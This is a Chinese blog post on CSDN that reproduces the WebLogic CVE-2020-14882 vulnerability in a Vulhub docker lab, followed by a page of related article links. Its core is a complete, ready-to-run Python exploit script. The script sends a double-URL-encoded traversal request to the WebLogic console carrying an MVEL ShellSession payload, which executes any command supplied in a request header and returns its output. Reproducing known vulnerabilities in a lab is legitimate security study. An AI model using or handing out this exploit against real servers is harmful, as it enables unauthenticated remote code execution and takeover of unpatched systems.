【Vulhub漏洞复现】Weblogic(CVE-2020-14882)漏洞复现

最新推荐文章于 2024-05-14 10:45:34 发布
最新推荐文章于 2024-05-14 10:45:34 发布
阅读量1.7k 收藏 3
点赞数
分类专栏: vulhub&vulfocus漏洞复现 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59924300/article/details/123069603
版权

影响范围:

WebLogic:10.3.6.0.0、12.1.3.0.0、12.2.1.4.0、14.1.1.0.0

环境搭建:   

1.拉取docker:

cd /home/kali/桌面/vulhub/weblogic/CVE-2020-14882
sudo docker-compose up -d

2.查看docker端口映射信息

sudo docker ps

3.在浏览器中输入http://192.168.111.128:7001/console/login/LoginForm.jsp

漏洞复现:

Python代码:

#!/usr/bin/python3
# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0  - Unauthenticated RCE via GET request
# Exploit Author: xingluo
# CVE: CVE-2020-14882
import requests
import sys
import http.client
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
if len(sys.argv) != 3:
    print("[+] Usage : python3 exploit.py http(s)://target:7001 command")
    exit()
target = sys.argv[1]
command = sys.argv[2]
request = requests.session()
headers_cmd = {
    'User-Agent': 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
    'cmd': command,
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Content-Type': 'application/x-www-form-urlencoded'
}
cmd="""/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread();
    weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork();
    java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
    field.setAccessible(true);
    Object obj = field.get(adapter);
    weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj);
    String cmd = req.getHeader("cmd");
    String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
    if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next();
    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);
    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
    res.getServletOutputStream().flush();}
    currentThread.interrupt();')
"""
url_cmd = target+cmd
response = request.get(url_cmd, headers=headers_cmd, verify=False)
print(response.text)
print("[+] Attack complete!")

FlynnAAAA
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-14882 WebLogic远程代码执行漏洞测试环境搭建
m0_63558213的博客
09-01 1720
CVE-2020-14882 WebLogic远程代码执行漏洞测试环境搭建,远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Console 执行任意代码。
vulhubWeblogicCVE-2018-2894)漏洞复现
qq_45300786的博客
04-10 1539
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修复了W
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)
最新发布
weixin_45653478的博客
05-14 839
Weblogic Pre-Auth Remote Command Execution 漏洞CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令。
Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883
weixin_51151498的博客
12-05 1579
weblogic漏洞复现
vulhub漏洞Weblogic管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)
weixin_45808483的博客
12-20 2834
Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883。 CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。 漏洞环境
SSRF(服务器请求伪造)漏洞分析——pikachu-ssrf、vulhub-weblogic-ssrf靶场复现
qq_45612828的博客
08-06 2988
SSRF(服务器请求伪造)——pikachu-ssrf、vulhub-weblogic-ssrf靶场复现
P6 利用Vulhub复现漏洞 -PostgreSQL 提权漏洞CVE-2018-1058)
在下小黄的博客
05-08 876
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P6 利用Vulhub复现漏洞 -PostgreSQL 提权漏洞CVE-2018-1058) 往期检索:程序设计学习笔记——目录 创建时间:2021年3月29日 软件: kali 2020.4 、Burp Suite Pro 、火狐浏览器 、Vulhub靶机 PostgreSQL 提权漏洞Vulhub 复现漏洞原理环境准备漏洞复现 Vulhub 复现 PostgreSQL 提权漏洞 漏洞原理 Po
vulhub靶场-weblogic漏洞复现
m0_62008601的博客
07-18 1766
vulhub-weblogic漏洞复现集 weak-password CVE-2018-2894 SSRF(CVE-2014-4210) CVE-2020-14882&14883 CVE-2018-2628 CVE-2017-10271
CVE-2020-14882 weblogic未授权远程命令执行漏洞
栉风沐雪的博客
02-22 4170
Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC 被公开,未经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台未授权远程命令执行漏洞
god_Zeo的安全博客
11-02 6072
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台未授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
CVE-2020-14882 WebLogic远程代码执行漏洞
星落的博客
12-03 1483
目录 简介 实验环境 实验环境部署 漏洞复现 POC代码 简介 Weblogic Server是美国Oracle公司主要的产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场主要的Java应用服务器软件之一。 利用该漏洞,远程攻击者可以通过发送恶意的HTTP GET请求。成功利用此漏洞的攻击者可以在未经身份验证的情况下控制 WebLogic Server COnsole,并执行任意代码。 实验环境 vulhub weblogic12.2.
漏洞复现Weblogic未授权命令执行漏洞CVE-2020-14882
weixin_43486390的博客
12-17 1969
CVE-2020-14882
CVE-2020-14882vulhub weblogic漏洞复现
weixin_65722679的博客
07-04 220
CVE-2020-14882vulhub weblogic漏洞复现
CVE-2020-14882/14883: Weblogic ConSole HTTP 协议代码执行漏洞通告
爱国小白帽
10-29 3626
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-102901 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-29 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC已经公开,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HT
CVE-2020-14882​&14883:Weblogic RCE复现1
08-03
近期,两个关键性漏洞 CVE-2020-14882CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值